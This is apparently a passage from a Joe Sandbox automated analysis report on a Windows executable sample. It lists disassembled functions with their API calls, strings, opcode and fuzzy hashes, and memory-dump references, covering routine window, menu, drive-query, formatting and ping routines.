Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: d8baf185d39e82e0c26f17d6eee79ee83d0f69c3a088fc8502d4e1594ba0125f
Instruction ID: 169a478ee169cd7a630e371d467de876688cc15c7caf9698b6a78dbf81d38f36
Opcode Fuzzy Hash: d8baf185d39e82e0c26f17d6eee79ee83d0f69c3a088fc8502d4e1594ba0125f
Instruction Fuzzy Hash: 25B11A75A00209AFDB04DFA8C888DAEBBB9FF48314F048459F909EB261DB34ED45DB50

Function 00FEC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00FEC283
GetWindowRect.USER32(00000000,?), ref: 00FEC295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00FEC2F3
GetDlgItem.USER32(?,00000002), ref: 00FEC2FE
GetWindowRect.USER32(00000000,?), ref: 00FEC310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00FEC364
GetDlgItem.USER32(?,000003E9), ref: 00FEC372
GetWindowRect.USER32(00000000,?), ref: 00FEC383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00FEC3C6
GetDlgItem.USER32(?,000003EA), ref: 00FEC3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00FEC3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 00FEC3FE

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 7d61141c51695465c4f07af38fea566dc85e0cf1e6ef7cf6287c8bf3f3375314
Instruction ID: f963b246a58c9e0ab35c3fec6fa366df5112e6305ff6628daa747d6aa2d595a6
Opcode Fuzzy Hash: 7d61141c51695465c4f07af38fea566dc85e0cf1e6ef7cf6287c8bf3f3375314
Instruction Fuzzy Hash: 27519071B00205AFDB18CFB9DD89AAEBBBAFB88310F14852DF605D7294DB749D048B50

Function 00F9201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00F91B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F92036,?,00000000,?,?,?,?,00F916CB,00000000,?), ref: 00F91B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00F920D3
KillTimer.USER32(-00000001,?,?,?,?,00F916CB,00000000,?,?,00F91AE2,?,?), ref: 00F9216E
DestroyAcceleratorTable.USER32(00000000), ref: 00FCBCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F916CB,00000000,?,?,00F91AE2,?,?), ref: 00FCBCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F916CB,00000000,?,?,00F91AE2,?,?), ref: 00FCBCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F916CB,00000000,?,?,00F91AE2,?,?), ref: 00FCBD0A
DeleteObject.GDI32(00000000), ref: 00FCBD1C

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: e7abfd2500aeaa7a6b233c616c20af8c5357fef46cf771a534648c9484e85a06
Instruction ID: b4343a7f9e41412d3af20f8a96818a5f77a0e0abaf6e12860ddfaa44d0421186
Opcode Fuzzy Hash: e7abfd2500aeaa7a6b233c616c20af8c5357fef46cf771a534648c9484e85a06
Instruction Fuzzy Hash: C061AE35900B02EFEB75DF14D94AB2AB7F1FF40322F50441CE5829A664C77AA895EF80

Function 00F921A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00F925DB: GetWindowLongW.USER32(?,000000EB), ref: 00F925EC

GetSysColor.USER32(0000000F), ref: 00F921D3

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: e73d97dea9455899b0148eb0119945145454d176405f048b693ea24b15b78a39
Instruction ID: b3d031e0765c9dff10ee2ca7631f970a3b2994d85553901c2cccc06a40750688
Opcode Fuzzy Hash: e73d97dea9455899b0148eb0119945145454d176405f048b693ea24b15b78a39
Instruction Fuzzy Hash: 8F41E431404141AFFF659F28EC89BB93B65EB06331F184255FEA58A1E5C7368C82EB21

Function 00FFA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,0101F910), ref: 00FFA90B
GetDriveTypeW.KERNEL32(00000061,010489A0,00000061), ref: 00FFA9D5
_wcscpy.LIBCMT ref: 00FFA9FF

Strings

unknown, xrefs: 00FFA996
removable, xrefs: 00FFA93D
fixed, xrefs: 00FFA953
cdrom, xrefs: 00FFA927
network, xrefs: 00FFA969
ramdisk, xrefs: 00FFA97F
all, xrefs: 00FFA911

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: e69bbee563eb66317faa7bc9c0e6587da02cf2a6c6331869812e8da84602963a
Instruction ID: e318b01ec1ae4b7260020f1e931177a23e1be4f74868b58cf9edab9c8c578be6
Opcode Fuzzy Hash: e69bbee563eb66317faa7bc9c0e6587da02cf2a6c6331869812e8da84602963a
Instruction Fuzzy Hash: 2D51DEB1518305ABC710EF14CC92AAFB7A5FF84310F14482DF699572A2DB78DD09EA43

Function 00F99837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00F99862
__swprintf.LIBCMT ref: 00F998AC
__i64tow.LIBCMT ref: 00FCF5E6

Strings

False, xrefs: 00FCF5AE
0x%p, xrefs: 00FCF5C8
True, xrefs: 00FCF5A7
%.15g, xrefs: 00F998A6

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: e10053e8456454c3d0b1026a0a7694e0bae1a7cc4cca99cfae7098ee4ef6ac3b
Instruction ID: 06a4d527e0c766f9ed9330da1ce83a03927cbba0d297a9d54b4d865dd0c38d56
Opcode Fuzzy Hash: e10053e8456454c3d0b1026a0a7694e0bae1a7cc4cca99cfae7098ee4ef6ac3b
Instruction Fuzzy Hash: C9412972904206AFEF24DF39DD42FBAB3E9EF09310F24487EE549C7241EA759905AB10

Function 01017152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0101716A
CreateMenu.USER32 ref: 01017185
SetMenu.USER32(?,00000000), ref: 01017194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01017221
IsMenu.USER32(?), ref: 01017237
CreatePopupMenu.USER32 ref: 01017241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0101726E
DrawMenuBar.USER32 ref: 01017276

Strings

0, xrefs: 01017160
F, xrefs: 01017262

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 845fb95c03aeeecce417a9b7236f93a2f7c686e9214093b848f9878690631ac3
Instruction ID: b1f5e2206ebe35f75a91fd4eb975ad950bbc9f1ec66cac95ab2096961c95dff5
Opcode Fuzzy Hash: 845fb95c03aeeecce417a9b7236f93a2f7c686e9214093b848f9878690631ac3
Instruction Fuzzy Hash: 97413574A01209EFEB20DFA8D884EDA7BF5FF48310F140068FA85A7355D73AA914CB90

Function 010174BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0101755E
CreateCompatibleDC.GDI32(00000000), ref: 01017565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 01017578
SelectObject.GDI32(00000000,00000000), ref: 01017580
GetPixel.GDI32(00000000,00000000,00000000), ref: 0101758B
DeleteDC.GDI32(00000000), ref: 01017594
GetWindowLongW.USER32(?,000000EC), ref: 0101759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 010175B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 010175BE

Strings

static, xrefs: 010174F6

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: f2c929cfb3245c4616e08a7dcba1af85848327c9c62994091a488048d76d410a
Instruction ID: d8ffa57273da394989be400d68e632ca4ec7daa9a304dde6ba1815ad0ab85e07
Opcode Fuzzy Hash: f2c929cfb3245c4616e08a7dcba1af85848327c9c62994091a488048d76d410a
Instruction Fuzzy Hash: 9F316D32100216BBDF229F68DC08FDB3FA9FF09360F110214FA9596194CB7AD815DBA4

Function 00FB6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FB6E3E

Part of subcall function 00FB8B28: __getptd_noexit.LIBCMT ref: 00FB8B28

__gmtime64_s.LIBCMT ref: 00FB6ED7
__gmtime64_s.LIBCMT ref: 00FB6F0D
__gmtime64_s.LIBCMT ref: 00FB6F2A
__allrem.LIBCMT ref: 00FB6F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB6F9C
__allrem.LIBCMT ref: 00FB6FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB6FD1
__allrem.LIBCMT ref: 00FB6FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB7006
__invoke_watson.LIBCMT ref: 00FB7077

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: 40bffd88fb0f5c69b0cb46fbda0575584e771e784daa6486d87b85b52067aed2
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: 8771F876E00717ABD714FE6ADC42BEAB7B8AF44364F14812EF514D6281E778D900AF90

Function 00FF2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FF2542
GetMenuItemInfoW.USER32(01055890,000000FF,00000000,00000030), ref: 00FF25A3
SetMenuItemInfoW.USER32(01055890,00000004,00000000,00000030), ref: 00FF25D9
Sleep.KERNEL32(000001F4), ref: 00FF25EB
GetMenuItemCount.USER32(?), ref: 00FF262F
GetMenuItemID.USER32(?,00000000), ref: 00FF264B
GetMenuItemID.USER32(?,-00000001), ref: 00FF2675
GetMenuItemID.USER32(?,?), ref: 00FF26BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FF2700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FF2714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FF2735

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 5d6d6721063944ee80ecdad8b762983995c9660ce69b376b1d346078ea1cde9e
Instruction ID: 1b343f9a436486fd8b14265180de62d188f7f64d556ecd83f020f78a0a4009d5
Opcode Fuzzy Hash: 5d6d6721063944ee80ecdad8b762983995c9660ce69b376b1d346078ea1cde9e
Instruction Fuzzy Hash: 4A618F7190024DAFDB61DFA4DC88EBEBBB8EF05354F140059EA41A7261D73AAD05EB21

Function 01016F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01016FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01016FA8
GetWindowLongW.USER32(?,000000F0), ref: 01016FCC
_memset.LIBCMT ref: 01016FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01016FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 01017067

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 45dac03c0cd201c2710ddb9ea5be92e44ec380354efbd2d2b7bf9190bb2bb211
Instruction ID: d9276d6acd52baed47d1eb9b394f52f9854db7e41944ffdd2fe0b593ffa70684
Opcode Fuzzy Hash: 45dac03c0cd201c2710ddb9ea5be92e44ec380354efbd2d2b7bf9190bb2bb211
Instruction Fuzzy Hash: C0617C75900208AFDB21DFA8CC81EEE77F9EF09710F100199FA55EB291C779A945CB90

Function 00FE6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00FE6BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00FE6C18
VariantInit.OLEAUT32(?), ref: 00FE6C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00FE6C4A
VariantCopy.OLEAUT32(?,?), ref: 00FE6C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00FE6CB1
VariantClear.OLEAUT32(?), ref: 00FE6CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00FE6CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FE6CDC
VariantClear.OLEAUT32(?), ref: 00FE6CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FE6CF9

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 8c7bec63d8fae1299752bba1dacd31d6e0f3ec40b229fad86d4e9b2c82b37ea9
Instruction ID: 21eb4976947994490c40dea9cf06a37dbc7446e396155aeb32285b4203b8d3c7
Opcode Fuzzy Hash: 8c7bec63d8fae1299752bba1dacd31d6e0f3ec40b229fad86d4e9b2c82b37ea9
Instruction Fuzzy Hash: FA419131A0021E9FDF10DFA9D8449ADBBB9FF58350F008069F995E7251CB39A949DF90

Function 01005732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 01005793
inet_addr.WSOCK32(?,?,?), ref: 010057D8
gethostbyname.WSOCK32(?), ref: 010057E4
IcmpCreateFile.IPHLPAPI ref: 010057F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 01005862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 01005878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 010058ED
WSACleanup.WSOCK32 ref: 010058F3

Strings

Ping, xrefs: 01005816

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 75bb173bf027c1619f778ab195f343458b16ed896ed2f613834870e734f7dd6d
Instruction ID: 1b3c8f9a36243699176c7d7044f3f0a4095162c2b22adfd83776bb1713e98c1e
Opcode Fuzzy Hash: 75bb173bf027c1619f778ab195f343458b16ed896ed2f613834870e734f7dd6d
Instruction Fuzzy Hash: 9B514D316042019FEB22DF29DC45B2A7BE4EF49720F044969F996EB2D1DB78E904DF42

Function 00FFB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00FFB4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00FFB546
GetLastError.KERNEL32 ref: 00FFB550
SetErrorMode.KERNEL32(00000000,READY), ref: 00FFB5BD

Strings

INVALID, xrefs: 00FFB58F
READY, xrefs: 00FFB596
NOTREADY, xrefs: 00FFB57C
UNKNOWN, xrefs: 00FFB575
READONLY, xrefs: 00FFB588

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: abbd5c124e7bddb1532634c898b600ab9b65326438e4670f49dfe9795c6b98c4
Instruction ID: b32f539d730669359ed0cfa57f76840a2204d8dc895cd70c9e2a2c59291842fa
Opcode Fuzzy Hash: abbd5c124e7bddb1532634c898b600ab9b65326438e4670f49dfe9795c6b98c4
Instruction Fuzzy Hash: 2C31A075A002099FDB10EFA8C885ABD77B4EF05714F18802AE605DB2A5DB799A01EB80

Function 00FE8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

Part of subcall function 00FEAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FEAABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00FE9014
GetDlgCtrlID.USER32 ref: 00FE901F
GetParent.USER32 ref: 00FE903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 00FE903E
GetDlgCtrlID.USER32(?), ref: 00FE9047
GetParent.USER32(?), ref: 00FE9063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00FE9066

Strings

ComboBox, xrefs: 00FE8F9C
ListBox, xrefs: 00FE8FD1

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: b3f7b814ae29dbffd2ded54699056dacc408d1e4613ccf80308f6178596b66d4
Instruction ID: 35a8ae2a5377c679ed6e109ed3a7e6f3a7b2c200482bbe95f2fbbb54a8119644
Opcode Fuzzy Hash: b3f7b814ae29dbffd2ded54699056dacc408d1e4613ccf80308f6178596b66d4
Instruction Fuzzy Hash: 3F21D670A00249BBEF15ABB1CC85EFEBB75EF49320F100119F961972A1DB7D5819EB20

Function 00FE907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

Part of subcall function 00FEAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FEAABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00FE90FD
GetDlgCtrlID.USER32 ref: 00FE9108
GetParent.USER32 ref: 00FE9124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00FE9127
GetDlgCtrlID.USER32(?), ref: 00FE9130
GetParent.USER32(?), ref: 00FE914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 00FE914F

Strings

ComboBox, xrefs: 00FE9087
